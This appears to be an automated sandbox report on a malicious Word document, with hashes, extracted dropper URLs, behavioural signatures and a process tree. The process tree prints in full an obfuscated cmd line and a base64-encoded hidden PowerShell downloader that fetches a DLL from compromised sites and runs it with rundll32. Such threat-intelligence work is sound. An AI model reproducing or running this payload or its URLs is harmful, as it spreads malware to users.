Analysis

  • max time kernel
    139s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-01-2021 23:12

General

  • Target

    Documents.doc

  • Size

    87KB

  • MD5

    1df0b5bc020b7debcd01a3634d2ece0f

  • SHA1

    6969d80789fccc3d66fc37fda2fb674e0bab6b25

  • SHA256

    19b82276e00c7dd94381cb2e5fb6889eeee013a79cf4fb74d2f1cdc40051c718

  • SHA512

    b00bac9ef3374cbb8a5864dc810c866ddbd86abe6a55d67c4922f86d28187353153ac1425622ff1f28bcec0d18ffe1e89ddb8e588e2f8739f3a771899745d5a4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://globalruraldevelopmentagency.co.za/cgi-bin/inf/

exe.dropper

https://trioconcuerda.es/cgi-bin/Services/

exe.dropper

http://abbc.tv/wp-content/Triedit/

exe.dropper

http://asafina.co/wp-content/G3GLLO/

exe.dropper

http://bluepassgt.com/von-weise-ludzp/DNNXcQcRTT/

exe.dropper

http://larissarobles.com/wp-admin/SIGNUP/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Documents.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:576
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABzAEUAdAAtAGkAdABlAG0AIAAoACcAdgBhAHIAaQBBACcAKwAnAGIAbABFACcAKwAnADoAOAAnACsAJwBUAEsAbQAwACcAKQAgACgAIAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBvACcALAAnAHMAeQAnACwAJwBSAFkAJwAsACcAUwBUAGUATQAuAGkAbwAuAGQAaQBSAEUAYwBUACcAKQAgACAAKQA7ACAAJABvAFAANgBrAGkAPQAgAFsAdABZAHAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADEAfQB7ADYAfQB7ADAAfQB7ADUAfQB7ADMAfQAiACAALQBGACcAdAAnACwAJwBDAEUAcAAnACwAJwBTAHkAUwB0AGUAbQAuACcALAAnAEEAZwBlAHIAJwAsACcAbgBFAFQALgBTAGUAUgB2AEkAJwAsACcAbQBBAE4AJwAsACcATwBJAG4AJwApACAAOwAgACQAQwB3ADYAXwBqAHMANwA9ACQAUQAzADQAUQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASAA3ADkATQA7ACQATQBfADIATgA9ACgAKAAnAFkAMgAnACsAJwAzACcAKQArACcATQAnACkAOwAgACgAIAAgAGcAZQBUAC0ASQB0AGUAbQAgACAAKAAnAFYAQQBSAGkAYQAnACsAJwBiAEwARQAnACsAJwA6ADgAJwArACcAdABLAG0AMAAnACkAIAAgACkALgB2AEEATAB1AGUAOgA6ACIAQwBSAEUAYQBgAFQAYABlAGAAZABgAGkAUgBFAEMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcAAnACsAJwBVAEEARgByACcAKQArACcAdgAnACsAJwAzAHAAJwArACgAJwAzADUAcAAnACsAJwBVAEEATgAnACsAJwB0AHcAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBnAGkAcAAnACkAKwAnAFUAQQAnACkALQByAGUAUABMAGEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADEAMQAyACsAWwBDAGgAQQByAF0AOAA1ACsAWwBDAGgAQQByAF0ANgA1ACkALABbAEMAaABBAHIAXQA5ADIAKQApADsAJABPAF8AMABaAD0AKAAoACcARwAxACcAKwAnADkAJwApACsAJwBMACcAKQA7ACAAIAAoACAAIABWAGEAUgBJAEEAYgBMAEUAIAAoACcATwAnACsAJwBQADYASwBpACcAKQAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAeQBQAGAAUgBPAHQAbwBgAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABIAF8ANQBJAD0AKAAoACcAQgAzACcAKwAnADMAJwApACsAJwBaACcAKQA7ACQAVABzADMAdwBsAGIANAAgAD0AIAAoACcAVwAnACsAKAAnADkAJwArACcANABDACcAKQApADsAJABYADUAMQBUAD0AKAAoACcAQwAnACsAJwA5ADgAJwApACsAJwBWACcAKQA7ACQATABhAF8AeQA3AGUAMQA9ACQASABPAE0ARQArACgAKAAoACcATgBPAEgARgByAHYAJwArACcAMwAnACkAKwAoACcAcAAzACcAKwAnADUATgAnACkAKwAnAE8AJwArACgAJwBIACcAKwAnAE4AdAAnACsAJwB3AGgAYQBnAGkAJwApACsAJwBOACcAKwAnAE8AJwArACcASAAnACkALgAiAHIAZQBQAGwAYABBAGMAZQAiACgAKAAnAE4ATwAnACsAJwBIACcAKQAsACcAXAAnACkAKQArACQAVABzADMAdwBsAGIANAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFIANAA0AFkAPQAoACcARgAwACcAKwAnADQAVwAnACkAOwAkAFIAbQBzAGMAZgB0ADkAPQAoACcAQQBdACcAKwAoACcAWwBxAFsAJwArACcARAAnACkAKwAnAHMAOgAnACsAKAAnAC8AJwArACcALwBnACcAKQArACgAJwBsAG8AJwArACcAYgBhAGwAcgAnACsAJwB1ACcAKQArACgAJwByAGEAbAAnACsAJwBkAGUAdgBlAGwAJwApACsAKAAnAG8AJwArACcAcABtACcAKQArACgAJwBlAG4AJwArACcAdAAnACkAKwAoACcAYQAnACsAJwBnAGUAbgBjAHkALgAnACkAKwAnAGMAbwAnACsAKAAnAC4AegBhAC8AYwAnACsAJwBnACcAKQArACcAaQAnACsAKAAnAC0AJwArACcAYgBpAG4AJwApACsAKAAnAC8AJwArACcAaQBuAGYALwAnACkAKwAnAEAAJwArACgAJwBBAF0AWwBxAFsAJwArACcARAAnACsAJwBzADoALwAvACcAKQArACcAdAAnACsAJwByACcAKwAoACcAaQBvAGMAbwBuACcAKwAnAGMAdQAnACsAJwBlACcAKQArACcAcgAnACsAKAAnAGQAJwArACcAYQAuACcAKQArACcAZQAnACsAJwBzAC8AJwArACgAJwBjACcAKwAnAGcAaQAnACkAKwAoACcALQBiACcAKwAnAGkAJwArACcAbgAvAFMAJwArACcAZQByAHYAaQBjACcAKQArACcAZQAnACsAJwBzAC8AJwArACcAQAAnACsAJwBBACcAKwAoACcAXQBbACcAKwAnAHEAWwAnACkAKwAnAEQAJwArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACcAYgAnACsAKAAnAGIAJwArACcAYwAuAHQAJwApACsAJwB2AC8AJwArACcAdwBwACcAKwAoACcALQBjACcAKwAnAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AdAAnACsAJwAvACcAKwAnAFQAcgAnACsAJwBpAGUAZABpAHQAJwApACsAKAAnAC8AQABBACcAKwAnAF0AWwAnACkAKwAoACcAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAvACcAKwAnAGEAcwBhACcAKwAnAGYAaQAnACkAKwAnAG4AYQAnACsAJwAuACcAKwAoACcAYwBvACcAKwAnAC8AdwBwACcAKQArACcALQBjACcAKwAnAG8AbgAnACsAJwB0ACcAKwAoACcAZQAnACsAJwBuAHQAJwArACcALwBHADMARwBMAEwAJwArACcATwAnACkAKwAoACcALwBAACcAKwAnAEEAJwApACsAKAAnAF0AWwAnACsAJwBxAFsARAA6AC8AJwApACsAKAAnAC8AYgBsACcAKwAnAHUAJwApACsAKAAnAGUAJwArACcAcABhACcAKQArACcAcwBzACcAKwAnAGcAdAAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB2ACcAKQArACgAJwBvAG4AJwArACcALQB3AGUAaQBzAGUALQAnACsAJwBsACcAKQArACcAdQBkACcAKwAoACcAegAnACsAJwBwAC8AJwApACsAKAAnAEQATgBOAFgAYwAnACsAJwBRAGMAJwArACcAUgBUACcAKQArACgAJwBUACcAKwAnAC8AQAAnACkAKwAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAKAAnAGEAcgBpACcAKwAnAHMAcwBhACcAKwAnAHIAbwBiACcAKQArACcAbAAnACsAJwBlAHMAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8AUwBJAEcATgAnACsAJwBVAFAAJwArACcALwAnACkAKQAuACIAcgBFAGAAUABMAGEAYwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAJwArACcAcwBlACcAKQArACcAdwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAnAGEAZQAnACsAJwBmAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAUwBQAGAATABpAFQAIgAoACQATgA2ADkARQAgACsAIAAkAEMAdwA2AF8AagBzADcAIAArACAAJABVADAANABPACkAOwAkAFQAOAAwAFIAPQAoACcAVwAnACsAKAAnADEAMQAnACsAJwBVACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGsAeQB2AHUAXwByACAAaQBuACAAJABSAG0AcwBjAGYAdAA5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQAnACsAJwBPACcAKwAnAGIAagBlAGMAdAAnACkAIABzAFkAcwBUAGUAbQAuAE4ARQB0AC4AdwBFAEIAYwBsAGkARQBOAHQAKQAuACIARABPAGAAdwBOAGwATwBhAGQAYABGAGkAYABsAGUAIgAoACQAVgBrAHkAdgB1AF8AcgAsACAAJABMAGEAXwB5ADcAZQAxACkAOwAkAE4AMwA3AEoAPQAoACgAJwBVADAAJwArACcANAAnACkAKwAnAEwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEwAYQBfAHkANwBlADEAKQAuACIAbABgAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADMAMAApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAJwArACcAbAAzADIAJwApACAAJABMAGEAXwB5ADcAZQAxACwAKAAoACcAUwBoAG8AJwArACcAdwAnACsAJwBEAGkAJwApACsAJwBhACcAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABgAG8AYABTAFQAUgBpAG4AZwAiACgAKQA7ACQATQA1ADEAVQA9ACgAJwBQADAAJwArACcAMQBXACcAKQA7AGIAcgBlAGEAawA7ACQATQAyADQARgA9ACgAJwBMACcAKwAoACcAOAAnACsAJwAyAFIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANgA0AE0APQAoACcAWQAnACsAKAAnADYANgAnACsAJwBZACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:4068
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:3792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABzAEUAdAAtAGkAdABlAG0AIAAoACcAdgBhAHIAaQBBACcAKwAnAGIAbABFACcAKwAnADoAOAAnACsAJwBUAEsAbQAwACcAKQAgACgAIAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBvACcALAAnAHMAeQAnACwAJwBSAFkAJwAsACcAUwBUAGUATQAuAGkAbwAuAGQAaQBSAEUAYwBUACcAKQAgACAAKQA7ACAAJABvAFAANgBrAGkAPQAgAFsAdABZAHAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADEAfQB7ADYAfQB7ADAAfQB7ADUAfQB7ADMAfQAiACAALQBGACcAdAAnACwAJwBDAEUAcAAnACwAJwBTAHkAUwB0AGUAbQAuACcALAAnAEEAZwBlAHIAJwAsACcAbgBFAFQALgBTAGUAUgB2AEkAJwAsACcAbQBBAE4AJwAsACcATwBJAG4AJwApACAAOwAgACQAQwB3ADYAXwBqAHMANwA9ACQAUQAzADQAUQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASAA3ADkATQA7ACQATQBfADIATgA9ACgAKAAnAFkAMgAnACsAJwAzACcAKQArACcATQAnACkAOwAgACgAIAAgAGcAZQBUAC0ASQB0AGUAbQAgACAAKAAnAFYAQQBSAGkAYQAnACsAJwBiAEwARQAnACsAJwA6ADgAJwArACcAdABLAG0AMAAnACkAIAAgACkALgB2AEEATAB1AGUAOgA6ACIAQwBSAEUAYQBgAFQAYABlAGAAZABgAGkAUgBFAEMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcAAnACsAJwBVAEEARgByACcAKQArACcAdgAnACsAJwAzAHAAJwArACgAJwAzADUAcAAnACsAJwBVAEEATgAnACsAJwB0AHcAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBnAGkAcAAnACkAKwAnAFUAQQAnACkALQByAGUAUABMAGEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADEAMQAyACsAWwBDAGgAQQByAF0AOAA1ACsAWwBDAGgAQQByAF0ANgA1ACkALABbAEMAaABBAHIAXQA5ADIAKQApADsAJABPAF8AMABaAD0AKAAoACcARwAxACcAKwAnADkAJwApACsAJwBMACcAKQA7ACAAIAAoACAAIABWAGEAUgBJAEEAYgBMAEUAIAAoACcATwAnACsAJwBQADYASwBpACcAKQAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAeQBQAGAAUgBPAHQAbwBgAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABIAF8ANQBJAD0AKAAoACcAQgAzACcAKwAnADMAJwApACsAJwBaACcAKQA7ACQAVABzADMAdwBsAGIANAAgAD0AIAAoACcAVwAnACsAKAAnADkAJwArACcANABDACcAKQApADsAJABYADUAMQBUAD0AKAAoACcAQwAnACsAJwA5ADgAJwApACsAJwBWACcAKQA7ACQATABhAF8AeQA3AGUAMQA9ACQASABPAE0ARQArACgAKAAoACcATgBPAEgARgByAHYAJwArACcAMwAnACkAKwAoACcAcAAzACcAKwAnADUATgAnACkAKwAnAE8AJwArACgAJwBIACcAKwAnAE4AdAAnACsAJwB3AGgAYQBnAGkAJwApACsAJwBOACcAKwAnAE8AJwArACcASAAnACkALgAiAHIAZQBQAGwAYABBAGMAZQAiACgAKAAnAE4ATwAnACsAJwBIACcAKQAsACcAXAAnACkAKQArACQAVABzADMAdwBsAGIANAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFIANAA0AFkAPQAoACcARgAwACcAKwAnADQAVwAnACkAOwAkAFIAbQBzAGMAZgB0ADkAPQAoACcAQQBdACcAKwAoACcAWwBxAFsAJwArACcARAAnACkAKwAnAHMAOgAnACsAKAAnAC8AJwArACcALwBnACcAKQArACgAJwBsAG8AJwArACcAYgBhAGwAcgAnACsAJwB1ACcAKQArACgAJwByAGEAbAAnACsAJwBkAGUAdgBlAGwAJwApACsAKAAnAG8AJwArACcAcABtACcAKQArACgAJwBlAG4AJwArACcAdAAnACkAKwAoACcAYQAnACsAJwBnAGUAbgBjAHkALgAnACkAKwAnAGMAbwAnACsAKAAnAC4AegBhAC8AYwAnACsAJwBnACcAKQArACcAaQAnACsAKAAnAC0AJwArACcAYgBpAG4AJwApACsAKAAnAC8AJwArACcAaQBuAGYALwAnACkAKwAnAEAAJwArACgAJwBBAF0AWwBxAFsAJwArACcARAAnACsAJwBzADoALwAvACcAKQArACcAdAAnACsAJwByACcAKwAoACcAaQBvAGMAbwBuACcAKwAnAGMAdQAnACsAJwBlACcAKQArACcAcgAnACsAKAAnAGQAJwArACcAYQAuACcAKQArACcAZQAnACsAJwBzAC8AJwArACgAJwBjACcAKwAnAGcAaQAnACkAKwAoACcALQBiACcAKwAnAGkAJwArACcAbgAvAFMAJwArACcAZQByAHYAaQBjACcAKQArACcAZQAnACsAJwBzAC8AJwArACcAQAAnACsAJwBBACcAKwAoACcAXQBbACcAKwAnAHEAWwAnACkAKwAnAEQAJwArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACcAYgAnACsAKAAnAGIAJwArACcAYwAuAHQAJwApACsAJwB2AC8AJwArACcAdwBwACcAKwAoACcALQBjACcAKwAnAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AdAAnACsAJwAvACcAKwAnAFQAcgAnACsAJwBpAGUAZABpAHQAJwApACsAKAAnAC8AQABBACcAKwAnAF0AWwAnACkAKwAoACcAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAvACcAKwAnAGEAcwBhACcAKwAnAGYAaQAnACkAKwAnAG4AYQAnACsAJwAuACcAKwAoACcAYwBvACcAKwAnAC8AdwBwACcAKQArACcALQBjACcAKwAnAG8AbgAnACsAJwB0ACcAKwAoACcAZQAnACsAJwBuAHQAJwArACcALwBHADMARwBMAEwAJwArACcATwAnACkAKwAoACcALwBAACcAKwAnAEEAJwApACsAKAAnAF0AWwAnACsAJwBxAFsARAA6AC8AJwApACsAKAAnAC8AYgBsACcAKwAnAHUAJwApACsAKAAnAGUAJwArACcAcABhACcAKQArACcAcwBzACcAKwAnAGcAdAAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB2ACcAKQArACgAJwBvAG4AJwArACcALQB3AGUAaQBzAGUALQAnACsAJwBsACcAKQArACcAdQBkACcAKwAoACcAegAnACsAJwBwAC8AJwApACsAKAAnAEQATgBOAFgAYwAnACsAJwBRAGMAJwArACcAUgBUACcAKQArACgAJwBUACcAKwAnAC8AQAAnACkAKwAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAKAAnAGEAcgBpACcAKwAnAHMAcwBhACcAKwAnAHIAbwBiACcAKQArACcAbAAnACsAJwBlAHMAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8AUwBJAEcATgAnACsAJwBVAFAAJwArACcALwAnACkAKQAuACIAcgBFAGAAUABMAGEAYwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAJwArACcAcwBlACcAKQArACcAdwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAnAGEAZQAnACsAJwBmAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAUwBQAGAATABpAFQAIgAoACQATgA2ADkARQAgACsAIAAkAEMAdwA2AF8AagBzADcAIAArACAAJABVADAANABPACkAOwAkAFQAOAAwAFIAPQAoACcAVwAnACsAKAAnADEAMQAnACsAJwBVACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGsAeQB2AHUAXwByACAAaQBuACAAJABSAG0AcwBjAGYAdAA5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQAnACsAJwBPACcAKwAnAGIAagBlAGMAdAAnACkAIABzAFkAcwBUAGUAbQAuAE4ARQB0AC4AdwBFAEIAYwBsAGkARQBOAHQAKQAuACIARABPAGAAdwBOAGwATwBhAGQAYABGAGkAYABsAGUAIgAoACQAVgBrAHkAdgB1AF8AcgAsACAAJABMAGEAXwB5ADcAZQAxACkAOwAkAE4AMwA3AEoAPQAoACgAJwBVADAAJwArACcANAAnACkAKwAnAEwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEwAYQBfAHkANwBlADEAKQAuACIAbABgAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADMAMAApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAJwArACcAbAAzADIAJwApACAAJABMAGEAXwB5ADcAZQAxACwAKAAoACcAUwBoAG8AJwArACcAdwAnACsAJwBEAGkAJwApACsAJwBhACcAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABgAG8AYABTAFQAUgBpAG4AZwAiACgAKQA7ACQATQA1ADEAVQA9ACgAJwBQADAAJwArACcAMQBXACcAKQA7AGIAcgBlAGEAawA7ACQATQAyADQARgA9ACgAJwBMACcAKwAoACcAOAAnACsAJwAyAFIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANgA0AE0APQAoACcAWQAnACsAKAAnADYANgAnACsAJwBZACcAKQApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll,ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2236
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll,ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:740
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fksrdfvjb\sxegiuid.ahc",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1140

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll
      MD5

      ebf1c708f6103630cee2a7e5f34062b5

      SHA1

      f1932272f7602919c011143d940478d20b25e82c

      SHA256

      1b77fe06d96895d0af822dd9b037d32f8ead1e4ebe25709321e28a58df8094df

      SHA512

      2c64996ef37c7b20337b660a75ddda7dd0f2fb417f6b4d84ec0676f12f7ee76af0c48e08bb06503c1e037668cadecb5150b258c4394772000dba834cde85b8c2

    • \Users\Admin\Frv3p35\Ntwhagi\W94C.dll
      MD5

      ebf1c708f6103630cee2a7e5f34062b5

      SHA1

      f1932272f7602919c011143d940478d20b25e82c

      SHA256

      1b77fe06d96895d0af822dd9b037d32f8ead1e4ebe25709321e28a58df8094df

      SHA512

      2c64996ef37c7b20337b660a75ddda7dd0f2fb417f6b4d84ec0676f12f7ee76af0c48e08bb06503c1e037668cadecb5150b258c4394772000dba834cde85b8c2

    • memory/576-2-0x00007FFC307B0000-0x00007FFC30DE7000-memory.dmp
      Filesize

      6.2MB

    • memory/740-10-0x0000000000000000-mapping.dmp
    • memory/1140-12-0x0000000000000000-mapping.dmp
    • memory/1340-4-0x0000000000000000-mapping.dmp
    • memory/1340-5-0x00007FFC29A50000-0x00007FFC2A43C000-memory.dmp
      Filesize

      9.9MB

    • memory/1340-6-0x0000027355C20000-0x0000027355C21000-memory.dmp
      Filesize

      4KB

    • memory/1340-7-0x000002736DF20000-0x000002736DF21000-memory.dmp
      Filesize

      4KB

    • memory/2236-8-0x0000000000000000-mapping.dmp
    • memory/3792-3-0x0000000000000000-mapping.dmp